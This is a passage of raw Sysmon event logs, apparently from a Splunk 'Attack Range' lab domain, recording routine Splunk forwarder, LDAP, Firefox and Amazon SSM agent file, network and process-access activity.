Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.463{C8EA50B7-1B33-6216-9C07-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000300266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:04.692{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CEF305939B9A4DF97CAD539C9F2AAF9,SHA256=BA458D9F8897C98F214655FCFCCDF28A9DF20F84292A28A229DE5EA464AFB1E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:04.035{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDD7B94D1B8BB731A046061F6510AFF4,SHA256=8BACE14E92E7992B9A15764865EE7C75F4743A63EBF32AC9561038584D224717,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.705{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49710-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:05.707{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F074429C489DFDD4EF7E2607916F1CF,SHA256=2875C27D21E3FD385E9D8E3E0373969A4746F325E864AD551174F0B766F11D89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.652{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49711-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000300267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.652{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49711-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000224053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:05.051{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=568A5B886450C4C9F7722F89D06465C1,SHA256=5311B3ADE3074BD146755AAEB403FEE962709217AEE480490AA4AED7C1061A68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:06.728{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A06EA7675A76E649DCC032F57E8F0968,SHA256=A5CCB1F6A8C06B38094C391AD82D66DB17CB401C7E801A8CAB41AC7D6A21409F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:06.066{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64CD4B5696D34F67B22FA8D793F00559,SHA256=FD623655505F8E6DAFDCFC6F2B5246019F694C33A6C1678E2A8EE2DCA8DE6DEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:07.743{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6490520E2A78FDB4A08C30D2E0F3B8,SHA256=240D836C9D4AD227441A02937127F7B30CA404D870AB0DC78A08E3CBE9FE3917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:07.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=424165C0C0483D89A7D46B115553C4BF,SHA256=DE060A268117D7D4F2388EDEE546BB875C8A422548BEAAB6951B264DED220988,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:08.758{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DADE9012E48C8CD5FFE4320F186D85E,SHA256=19EAFF9E04AF64EE074B4E45809EA08419C0324FD9DCBD22FD86B7B127E76C26,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:06.665{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51828-false10.0.1.12-8000- 23542300x8000000000000000224056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:08.097{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDE64DA47BA6E489C936E7FE7BE4242,SHA256=5743EA1F3CCA9D11921EA08B04FC8C70CCF7F2409A84637BBB157C43FD2C4E32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:09.804{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2D3CAA6EAA204DC7F19C0B0D2BC642C,SHA256=3B6394FF86F353741F4FF15125ABD906F99504DAC4A865E4E76EF1C4847C70EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:09.113{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4832FB9F0E7897D67BD65B45496E218,SHA256=79A311F3741A1FC13A582FCCFA1B668A95857DDEB3A0E91B813EBF6A03CD7EEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:10.823{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A67BDA1CAE0FA580DEC20884FFDCC7B,SHA256=5C8B3506468217470BB4EDDE3797AA58D4AEC38A564C6905C1B65AFA1A7173C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:10.113{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A886106E832BEF6FBD64B971E946A0D,SHA256=FD73B9D91129CF5360984409B6F9E8D4F392CCF41105A08205B5E2A83719759B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:08.531{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49712-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:11.856{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA4BC1941158F7F00F9CBF28B408D532,SHA256=EB301FD7C2E942AC9607D70C5131BC1CF8CB5F3F515BB880866E823A44F799F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:11.128{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD72FF01177E21E205A0F48C2737E2D,SHA256=23D272879C6E146C4F5E9C5D95F49F4DD93C31F8D335BC0CBEAE9C55E1E1723B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:12.872{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22B171408E5DB54C1C7AA2C85428335D,SHA256=0C00FE8F77DC2EB43028BBE63E1C4FBC0E722033EF25B81E50E22EA69E7B503B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:12.363{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ED430152F8E7DAAE794BA7480255C38,SHA256=ECAD3345055F2D7FA734AA69888086AE0297A5A834AA4ADD52D316E32EC4EB25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:12.740{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=3F3E49AABC9CE1822065C12499F6AF8E,SHA256=69B37A10464E6BD8AB4D7CD954DF65C0165C0F628882CC004C36472C225424C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:13.886{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56C03CC4DA0DA54DF07C1D3A258D0303,SHA256=213ED491CFCEA3AB3EF2DCE906753F4971D82C4DBFF9B9371517A3C1F59A93E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:13.363{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EABB437D2406221596FB0C6AF0B0F2F,SHA256=D26F4CB4DE08DF84A106FEDB06368B430F14C6FEC25CD38F40E4B2192816A42F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:14.886{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C296C39C1C1BD7E0615257028A99533,SHA256=209C9FAC4339120FD1B1761B90354C2A89F9E35A196AAED319C99B642DFB6FA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:12.712{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51829-false10.0.1.12-8000- 23542300x8000000000000000224063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:14.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04D56F9627444BC1E1885D268573E228,SHA256=6AD0E58BCEFAA2962E976EE2CE5D58E3194E843DFBC6B9B4459B597D116CB990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:15.887{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ACC5507DD353AD18F7A2150B086F37C,SHA256=C6AF46493C4B2716459F70A3357F22FFFA807209126C2A9ED1FBB2E239FEFE1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:15.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4E781A19A540107838F148820E0C419,SHA256=55062EDF4620F62F6BD46D9C9E3FE56BA8D7A2535A4CF882EC0CA6348FA207D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:13.576{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49713-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:16.889{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0F04747C335A3F640838337F931B043,SHA256=9FB2208135A2B73FF4F80B24B379BAAD6E8F69DAEB6C316736F56CC4279B182B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:16.441{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDFBE04723C1C1A169054D5B96F61332,SHA256=5A4360F79EBAFE53B9437878012C6452DD0F5D623822C63CCA749A02CBDFABED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:17.889{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27FF0533926735D7C90A01460A8566C7,SHA256=5BD3E00F6D0B15F70E3A9462CB6685C9DDF50A10626AB49D1B33A6A5B6947254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:17.456{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C0F43929D6C4EFCA3634127EDC23AD,SHA256=3031536F64CCFFFE19DC85298C238C57E5466F9B675DD2988920535054010BC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:18.905{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D50014C8891AF1C4F7BE30C2D33DD5F4,SHA256=D71F48C6012ABB34EDAF8681CF2811710079325925867CBA54072C522A970D65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:18.472{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4912552CF72D2316D34E6F2BC0C951B,SHA256=1ABFC2F2B7DBAADCA8C56ACA2C435ABCB909B70411A7425CD504D56136AD4F2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:18.547{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-174MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.927{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1FE0DE4200C0C8741B8DC7C105B6B30,SHA256=A9F364C1F507F6053553AB6531D657754EEE53BACF11BC4F489E588AF057465E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.927{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8B0FCFD85E38ED81FAE7A78C91B849F,SHA256=A4C301DB2588A5306EE4C824B7A5D36958E0AF8AF1859438F1ACC482D30ACC77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:19.706{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D77CBC8B654D9932CE2FE657466FB86B,SHA256=A6A0B93B770A865B3E8315D800858DCCB900DEBA56FAA48FE5C6975D3708B47C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.705{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B43-6216-9E07-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.690{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.690{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 